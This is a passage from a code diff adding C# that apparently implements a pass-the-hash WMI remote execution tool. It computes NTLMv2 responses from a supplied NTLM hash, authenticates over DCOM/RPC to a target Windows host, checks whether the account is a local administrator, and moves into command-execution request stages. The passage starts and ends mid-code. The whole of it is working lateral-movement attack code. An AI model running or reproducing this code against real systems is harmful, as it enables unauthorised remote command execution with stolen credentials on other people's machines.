+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_NTLM_offset);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_offset);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_offset);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_offset);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_offset);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_negotiate_flags);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_bytes);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_bytes);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_bytes);
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                    NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response);
+                    assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
+                    packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
+                    //WMI_client_receive = WMISend(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
+                    WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
+                    WMI_client_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
+                    WMI_client_stream.Flush();
+                    byte[] causality_ID_bytes = new byte[16];
+                    r.NextBytes(causality_ID_bytes);
+                    OrderedDictionary packet_DCOM_remote_create_instance = WMIExec.DCOMRemoteCreateInstance(causality_ID_bytes, target_short);
+                    byte[] DCOM_remote_create_instance = Utilities.ConvertFromPacketOrderedDictionary(packet_DCOM_remote_create_instance);
+                    packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, DCOM_remote_create_instance.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x01, 0x00 }, new byte[] { 0x04, 0x00 }, null);
+                    WMI_client_send = Utilities.CombineByteArray(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC), DCOM_remote_create_instance);
+                    WMI_client_receive = SendStream(WMI_client_stream, WMI_client_send);
+                    TcpClient WMI_client_random_port = new TcpClient();
+                    WMI_client_random_port.Client.ReceiveTimeout = 30000;
+
+                    if (WMI_client_receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 24, 27)) == "05-00-00-00")
+                    {
+                        output.AppendLine("WMI Access Denied");
+                        return output.ToString();
+                    }
+                    else if (WMI_client_receive[2] == 3)
+                    {
+                        string error_code = BitConverter.ToString(new byte[] { WMI_client_receive[27], WMI_client_receive[26], WMI_client_receive[25], WMI_client_receive[24] });
+                        string[] error_code_array = error_code.Split('-');
+                        error_code = string.Join("", error_code_array);
+                        output.AppendLine(String.Format("Error Code: 0x{0}", error_code.ToString()));
+                        return output.ToString();
+                    }
+                    else if (WMI_client_receive[2] == 2 && AdminCheck)
+                    {
+                        output.AppendLine(String.Format("{0} is a local administrator on {1}", output_username, target_long));
+                        if (debug) { output.AppendLine("Exiting due to AdminCheck being set"); }
+                        return output.ToString();
+                    }
+                    else if (WMI_client_receive[2] == 2 && !AdminCheck)
+                    {
+                        if (debug) { output.AppendLine("Continuing since AdminCheck is false"); }
+                        if (target_short == "127.0.0.1")
+                        {
+                            target_short = auth_hostname;
+                        }
+                        byte[] target_unicode = Utilities.CombineByteArray(new byte[] { 0x07, 0x00 }, Encoding.Unicode.GetBytes(target_short + "["));
+                        string target_search = BitConverter.ToString(target_unicode).Replace("-", "");
+                        string WMI_message = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                        int target_index = WMI_message.IndexOf(target_search);
+
+                        if (target_index < 1)
+                        {
+                            IPAddress[] target_address_list = Dns.GetHostEntry(target_long).AddressList;
+                            foreach (IPAddress ip in target_address_list)
+                            {
+                                target_short = ip.Address.ToString();
+                                target_unicode = Utilities.CombineByteArray(new byte[] { 0x07, 0x00 }, Encoding.Unicode.GetBytes(target_short + "["));
+                                target_search = BitConverter.ToString(target_unicode).Replace("-", "");
+                                target_index = WMI_message.IndexOf(target_search);
+
+                                if (target_index >= 0)
+                                {
+                                    break;
+                                }
+                            }
+                        }
+
+                        if (target_index > 0)
+                        {
+                            int target_bytes_index = target_index / 2;
+                            byte[] WMI_random_port_bytes = Utilities.GetByteRange(WMI_client_receive, target_bytes_index + target_unicode.Length, target_bytes_index + target_unicode.Length + 8);
+                            WMI_random_port_string = BitConverter.ToString(WMI_random_port_bytes);
+                            int WMI_random_port_end_index = WMI_random_port_string.IndexOf("-5D");
+                            if (WMI_random_port_end_index > 0)
+                            {
+                                WMI_random_port_string = WMI_random_port_string.Substring(0, WMI_random_port_end_index);
+                            }
+                            WMI_random_port_string = WMI_random_port_string.Replace("-00", "").Replace("-", "");
+                            char[] random_port_char_array = WMI_random_port_string.ToCharArray();
+                            char[] chars = new char[] { random_port_char_array[1], random_port_char_array[3], random_port_char_array[5], random_port_char_array[7], random_port_char_array[9] };
+                            WMI_random_port_int = int.Parse(new string(chars));
+                            string reverse = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                            int reverse_index = reverse.IndexOf("4D454F570100000018AD09F36AD8D011A07500C04FB68820");
+                            int reverse_bytes_index = reverse_index / 2;
+                            byte[] OXID_bytes = Utilities.GetByteRange(WMI_client_receive, reverse_bytes_index + 32, reverse_bytes_index + 39);
+                            IPID = Utilities.GetByteRange(WMI_client_receive, reverse_bytes_index + 48, reverse_bytes_index + 63);
+                            OXID = BitConverter.ToString(OXID_bytes).Replace("-", "");
+                            OXID_index = reverse.IndexOf(OXID, reverse_index + 100);
+                            OXID_bytes_index = OXID_index / 2;
+                            object_UUID = Utilities.GetByteRange(WMI_client_receive, OXID_bytes_index + 12, OXID_bytes_index + 27);
+                        }
+                        if (WMI_random_port_int != 0)
+                        {
+                            try
+                            {
+                                WMI_client_random_port.Connect(target_long, WMI_random_port_int);
+                            }
+                            catch
+                            {
+                                output.AppendLine(String.Format("{0}:{1} did not respond", target_long, WMI_random_port_int));
+                                return output.ToString();
+                            }
+                        }
+                        else
+                        {
+                            output.AppendLine(String.Format("Random port extraction failure"));
+                            return output.ToString();
+                        }
+                    }
+                    else
+                    {
+                        output.AppendLine("An Unkonwn Error Occured");
+                        return output.ToString();
+                    }
+
+                    if (WMI_client_random_port.Connected)
+                    {
+                        if (debug) { output.AppendLine(String.Format("Connected to: {0} using port {1}", target_long, WMI_random_port_int)); }
+                        NetworkStream WMI_client_random_port_stream = WMI_client_random_port.GetStream();
+                        packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x03 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }, new byte[] { 0x00, 0x00 });
+                        packet_RPC["RPCBind_FragLength"] = new byte[] { 0xd0, 0x00 };
+                        packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
+                        packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x97, 0x82, 0x08, 0xa2 };
+                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
+                        WMI_client_receive = SendStream(WMI_client_random_port_stream, WMI_client_send);
+                        assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
+                        WMI_NTLMSSP = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                        WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000");
+                        WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2;
+                        WMI_domain_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_client_receive);
+                        WMI_target_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_client_receive);
+                        WMI_session_ID = Utilities.GetByteRange(WMI_client_receive, 44, 51);
+                        WMI_NTLM_challenge = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
+                        WMI_target_details = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 56 + WMI_domain_length, WMI_NTLMSSP_bytes_index + 55 + WMI_domain_length + WMI_target_length);
+                        WMI_target_time_bytes = Utilities.GetByteRange(WMI_target_details, WMI_target_details.Length - 12, WMI_target_details.Length - 5);
+                        sb = new StringBuilder();
+                        for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); };
+                        NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
+                        hash_string_array = sb.ToString().Split('-');
+                        auth_hostname = Environment.MachineName;
+                        auth_hostname_bytes = Encoding.Unicode.GetBytes(auth_hostname);
+                        auth_domain_bytes = Encoding.Unicode.GetBytes(domain);
+                        auth_username_bytes = Encoding.Unicode.GetBytes(username);
+                        auth_domain_length = BitConverter.GetBytes(auth_domain_bytes.Length);
+                        auth_domain_length = new byte[] { auth_domain_length[0], auth_domain_length[1] };
+                        auth_username_length = BitConverter.GetBytes(auth_username_bytes.Length);
+                        auth_username_length = new byte[] { auth_username_length[0], auth_username_length[1] };
+                        auth_hostname_length = BitConverter.GetBytes(auth_hostname_bytes.Length);
+                        auth_hostname_length = new byte[] { auth_hostname_length[0], auth_hostname_length[1] };
+                        auth_domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
+                        auth_username_offset = BitConverter.GetBytes(auth_domain_bytes.Length + 64);
+                        auth_hostname_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + 64);
+                        auth_LM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 64);
+                        auth_NTLM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 88);
+                        HMAC_MD5 = new HMACMD5();
+                        HMAC_MD5.Key = NTLM_hash_bytes;
+                        username_and_target = username.ToUpper();
+                        username_bytes = Encoding.Unicode.GetBytes(username_and_target);
+                        username_and_target_bytes = Utilities.CombineByteArray(username_bytes, auth_domain_bytes);
+                        NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
+                        r = new Random();
+                        client_challenge_bytes = new byte[8];
+                        r.NextBytes(client_challenge_bytes);
+                        security_blob_bytes = null;
+                        security_blob_bytes = Utilities.CombineByteArray(new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, WMI_target_time_bytes);
+                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, client_challenge_bytes);
+                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, WMI_target_details);
+                        security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                        server_challenge_and_security_blob_bytes = Utilities.CombineByteArray(WMI_NTLM_challenge, security_blob_bytes);
+                        HMAC_MD5.Key = NTLMv2_hash;
+                        NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
+                        session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
+                        byte[] client_signing_constant = new byte[] { 0x73, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x74, 0x6f, 0x20, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x2d, 0x74, 0x6f, 0x2d, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x20, 0x73, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x6d, 0x61, 0x67, 0x69, 0x63, 0x20, 0x63, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x00 };
+                        MD5CryptoServiceProvider MD5_crypto = new MD5CryptoServiceProvider();
+                        byte[] client_signing_key = MD5_crypto.ComputeHash(Utilities.CombineByteArray(session_base_key, client_signing_constant));
+                        NTLMv2_response = Utilities.CombineByteArray(NTLMv2_response, security_blob_bytes);
+                        NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
+                        NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
+                        WMI_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
+                        WMI_session_key_length = new byte[] { 0x00, 0x00 };
+                        WMI_negotiate_flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
+                        NTLMSSP_response = null;
+                        NTLMSSP_response = Utilities.CombineByteArray(new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }, auth_LM_offset);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_NTLM_offset);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_offset);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_offset);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_offset);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_length);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_session_key_offset);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, WMI_negotiate_flags);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_domain_bytes);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_username_bytes);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, auth_hostname_bytes);
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                        NTLMSSP_response = Utilities.CombineByteArray(NTLMSSP_response, NTLMv2_response);
+                        HMAC_MD5.Key = client_signing_key;
+                        sequence_number = new byte[] { 0x00, 0x00, 0x00, 0x00 };
+                        packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
+                        packet_RPC["RPCAUTH3_CallID"] = new byte[] { 0x02, 0x00, 0x00, 0x00 };
+                        packet_RPC["RPCAUTH3_AuthLevel"] = new byte[] { 0x04 };
+                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
+                        WMI_client_random_port_stream.Write(WMI_client_send, 0, WMI_client_send.Length);
+                        WMI_client_random_port_stream.Flush();
+                        packet_RPC = WMIExec.RPCRequest(new byte[] { 0x83 }, 76, 16, 4, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x03, 0x00 }, object_UUID);
+                        OrderedDictionary packet_rem_query_interface = WMIExec.DCOMRemQueryInterface(causality_ID_bytes, IPID, new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 });
+                        OrderedDictionary packet_NTLMSSP_verifier = WMIExec.NTLMSSPVerifier(4, new byte[] { 0x04 }, sequence_number);
+                        byte[] rem_query_interface = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_query_interface);
+                        byte[] NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
+                        HMAC_MD5.Key = client_signing_key;
+                        byte[] RPC_Sign = Utilities.CombineByteArray(sequence_number, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
+                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, rem_query_interface);
+                        RPC_Sign = Utilities.CombineByteArray(RPC_Sign, Utilities.GetByteRange(NTLMSSP_verifier, 0, 11));
+                        byte[] RPC_signature = HMAC_MD5.ComputeHash(RPC_Sign);
+                        RPC_signature = Utilities.GetByteRange(RPC_signature, 0, 7);
+                        packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_signature;
+                        NTLMSSP_verifier = Utilities.ConvertFromPacketOrderedDictionary(packet_NTLMSSP_verifier);
+                        WMI_client_send = Utilities.CombineByteArray(Utilities.ConvertFromPacketOrderedDictionary(packet_RPC), rem_query_interface);
+                        WMI_client_send = Utilities.CombineByteArray(WMI_client_send, NTLMSSP_verifier);
+                        WMI_client_receive = SendStream(WMI_client_random_port_stream, WMI_client_send);
+                        WMI_client_stage = "exit";
+
+                        if (WMI_client_receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 24, 27)) == "05-00-00-00")
+                        {
+                            output.AppendLine(String.Format("{0} WMI access denied on {1}", output_username, target_long));
+                            return output.ToString();
+                        }
+                        else if (WMI_client_receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 24, 27)) != "05-00-00-00")
+                        {
+                            string error_code = BitConverter.ToString(new byte[] { WMI_client_receive[27], WMI_client_receive[26], WMI_client_receive[25], WMI_client_receive[24] });
+                            string[] error_code_array = error_code.Split('-');
+                            error_code = string.Join("", error_code_array);
+                            output.AppendLine(String.Format("Error Code: 0x{0}", error_code.ToString()));
+                            return output.ToString();
+                        }
+                        else if (WMI_client_receive[2] == 2)
+                        {
+                            WMI_data = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                            OXID_index = WMI_data.IndexOf(OXID);
+                            OXID_bytes_index = OXID_index / 2;
+                            object_UUID2 = Utilities.GetByteRange(WMI_client_receive, OXID_bytes_index + 16, OXID_bytes_index + 31);
+                            WMI_client_stage = "AlterContext";
+                        }
+                        else
+                        {
+                            output.AppendLine("An Unkonwn Error Occured");
+                            return output.ToString();
+                        }
+
+                        //Moving on to Command Execution
+                        int request_split_index = 5500;
+                        string WMI_client_stage_next = "";
+                        bool request_split = false;
+
+                        while (WMI_client_stage != "exit")
+                        {
+                            if (debug) { output.AppendLine(WMI_client_stage); }
+                            if (WMI_client_receive[2] == 3)
+                            {
+                                string error_code = BitConverter.ToString(new byte[] { WMI_client_receive[27], WMI_client_receive[26], WMI_client_receive[25], WMI_client_receive[24] });
+                                string[] error_code_array = error_code.Split('-');
+                                error_code = string.Join("", error_code_array);
+                                output.AppendLine(String.Format("Execution failed with error code: 0x{0}", error_code.ToString()));
+                                WMI_client_stage = "exit";
+                            }
+
+                            switch (WMI_client_stage)
+                            {
+                                case "AlterContext":
+                                    {
+                                        switch (sequence_number[0])
+                                        {
+                                            case 0:
+                                                {
+                                                    alter_context_call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
+                                                    alter_context_context_ID = new byte[] { 0x02, 0x00 };
+                                                    alter_context_UUID = new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 };
+                                                    WMI_client_stage_next = "Request";
+                                                }
+                                                break;
+                                            case 1:
+                                                {
+                                                    alter_context_call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
+                                                    alter_context_context_ID = new byte[] { 0x03, 0x00 };
+                                                    alter_context_UUID = new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 };
+                                                    WMI_client_stage_next = "Request";
+                                                }
+                                                break;
+                                            case 6:
+                                                {
+                                                    alter_context_call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
+                                                    alter_context_context_ID = new byte[] { 0x04, 0x00 };
+                                                    alter_context_UUID = new byte[] { 0x99, 0xdc, 0x56, 0x95, 0x8c, 0x82, 0xcf, 0x11, 0xa3, 0x7e, 0x00, 0xaa, 0x00, 0x32, 0x40, 0xc7 };
+                                                    WMI_client_stage_next = "Request";
+                                                }
+                                                break;
+                                        }
+                                        packet_RPC = WMIExec.RPCAlterContext(assoc_group, alter_context_call_ID, alter_context_context_ID, alter_context_UUID);
+                                        WMI_client_send = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC);
+                                        WMI_client_receive = SendStream(WMI_client_random_port_stream, WMI_client_send);
+                                        WMI_client_stage = WMI_client_stage_next;
+                                    }
+                                    break;
+                                case "Request":
+                                    {
+                                        switch (sequence_number[0])
+                                        {
+                                            case 0:
+                                                {
+                                                    sequence_number = new byte[] { 0x01, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 12;
+                                                    request_call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
+                                                    request_context_ID = new byte[] { 0x02, 0x00 };
+                                                    request_opnum = new byte[] { 0x03, 0x00 };
+                                                    request_UUID = object_UUID2;
+                                                    hostname_length = BitConverter.GetBytes(auth_hostname.Length + 1);
+                                                    WMI_client_stage_next = "AlterContext";
+
+                                                    if (Convert.ToBoolean(auth_hostname.Length % 2))
+                                                    {
+                                                        auth_hostname_bytes = Utilities.CombineByteArray(auth_hostname_bytes, new byte[] { 0x00, 0x00 });
+                                                    }
+                                                    else
+                                                    {
+                                                        auth_hostname_bytes = Utilities.CombineByteArray(auth_hostname_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                    }
+
+                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 });
+                                                    stub_data = Utilities.CombineByteArray(stub_data, hostname_length);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                    stub_data = Utilities.CombineByteArray(stub_data, hostname_length);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, auth_hostname_bytes);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, process_ID_Bytes);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                }
+                                                break;
+                                            case 1:
+                                                {
+                                                    sequence_number = new byte[] { 0x02, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 8;
+                                                    request_call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
+                                                    request_context_ID = new byte[] { 0x03, 0x00 };
+                                                    request_opnum = new byte[] { 0x03, 0x00 };
+                                                    request_UUID = IPID;
+                                                    WMI_client_stage_next = "Request";
+                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                }
+                                                break;
+                                            case 2:
+                                                {
+                                                    sequence_number = new byte[] { 0x03, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 0;
+                                                    request_call_ID = new byte[] { 0x05, 0x00, 0x00, 0x00 };
+                                                    request_context_ID = new byte[] { 0x03, 0x00 };
+                                                    request_opnum = new byte[] { 0x06, 0x00 };
+                                                    request_UUID = IPID;
+                                                    WMI_namespace_length = BitConverter.GetBytes(target_short.Length + 14);
+                                                    WMI_namespace_unicode = Encoding.Unicode.GetBytes("\\\\" + target_short + "\\root\\cimv2");
+                                                    WMI_client_stage_next = "Request";
+
+                                                    if (Convert.ToBoolean(target_short.Length % 2))
+                                                    {
+                                                        WMI_namespace_unicode = Utilities.CombineByteArray(WMI_namespace_unicode, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                    }
+                                                    else
+                                                    {
+                                                        WMI_namespace_unicode = Utilities.CombineByteArray(WMI_namespace_unicode, new byte[] { 0x00, 0x00 });
+                                                    }
+
+                                                    stub_data = Utilities.CombineByteArray(new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, causality_ID_bytes);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 });
+                                                    stub_data = Utilities.CombineByteArray(stub_data, WMI_namespace_length);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                    stub_data = Utilities.CombineByteArray(stub_data, WMI_namespace_length);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, WMI_namespace_unicode);
+                                                    stub_data = Utilities.CombineByteArray(stub_data, new byte[] { 0x04, 0x00, 0x02, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2d, 0x00, 0x55, 0x00, 0x53, 0x00, 0x2c, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                                                }
+                                                break;
+                                            case 3:
+                                                {
+                                                    sequence_number = new byte[] { 0x04, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 8;
+                                                    request_context_ID = new byte[] { 0x00, 0x00 };
+                                                    request_call_ID = new byte[] { 0x06, 0x00, 0x00, 0x00 };
+                                                    request_opnum = new byte[] { 0x05, 0x00 };
+                                                    request_UUID = object_UUID;
+                                                    WMI_client_stage_next = "Request";
+                                                    WMI_data = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                                                    OXID_index = WMI_data.IndexOf(OXID);
+                                                    OXID_bytes_index = OXID_index / 2;
+                                                    IPID2 = Utilities.GetByteRange(WMI_client_receive, OXID_bytes_index + 16, OXID_bytes_index + 31);
+                                                    OrderedDictionary packet_rem_release = WMIExec.DCOMRemRelease(causality_ID_bytes, object_UUID2, IPID);
+                                                    stub_data = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_release);
+                                                }
+                                                break;
+                                            case 4:
+                                                {
+                                                    sequence_number = new byte[] { 0x05, 0x00, 0x00, 0x00 };
+                                                    request_flags = new byte[] { 0x83 };
+                                                    request_auth_padding = 4;
+                                                    request_context_ID = new byte[] { 0x00, 0x00 };
+                                                    request_call_ID = new byte[] { 0x07, 0x00, 0x00, 0x00 };
+                                                    request_opnum = new byte[] { 0x03, 0x00 };
+                                                    request_UUID = object_UUID;
+                                                    WMI_client_stage_next = "Request";
+                                                    packet_rem_query_interface = WMIExec.DCOMRemQueryInterface(causality_ID_bytes, IPID2, new byte[] { 0x9e, 0xc1, 0xfc, 0xc3, 0x70, 0xa9, 0xd2, 0x11, 0x8b, 0x5a, 0x00, 0xa0, 0xc9, 0xb7, 0xc9, 0xc4 });
+                                                    stub_data = Utilities.ConvertFromPacketOrderedDictionary(packet_rem_query_interface);
+
+
+                                                }
